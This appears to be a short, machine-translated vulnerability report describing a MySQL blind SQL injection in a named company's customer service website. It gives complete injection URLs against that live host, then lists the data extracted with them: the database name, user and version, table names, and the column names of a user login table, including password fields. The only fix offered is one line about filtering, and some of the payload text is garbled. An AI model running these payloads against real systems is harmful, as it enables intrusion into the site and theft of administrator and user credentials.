The jiuyang Customer Service Center website has a mysql blind injection (administrator and all registered user information can be obtained ):
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20aNd % 20 'A' % 20 lIke % 20'a
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20and % 20 (select % 20 length (database ())) = 12% 20aNd % 20's '% 20 lIke % 20's
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20and % 20 (select % 20abs (ascii (substr (database (), 107%) = 20108% 20and % 20aNd % 20's '% 20 lIke % 20's
...
...
...
And so on!
Database file directory:/var/lib/mysql/
Current Database Name: kfjoyoungscf
Current User name: service127 @ localhost
Database Version: 5.5.11-log
Some tables in the current database:
T_adminuser
T_diaocha
T_grade
T_hint
T_joyperson
T_joyuserlogin
T_jubao
T_liucheng
T_minglie
T_myproduct
T_newsbankuai
...
Some column names in the t_joyuserlogin table:
Joyloginid
Joyloginname
Joypasswd
Joytype
Joypasswdt
Registertime
Lastlogintime
Todaylogintimes
Totaltimes
Email
...
Solution:
Perform necessary filtering!
Author: leaf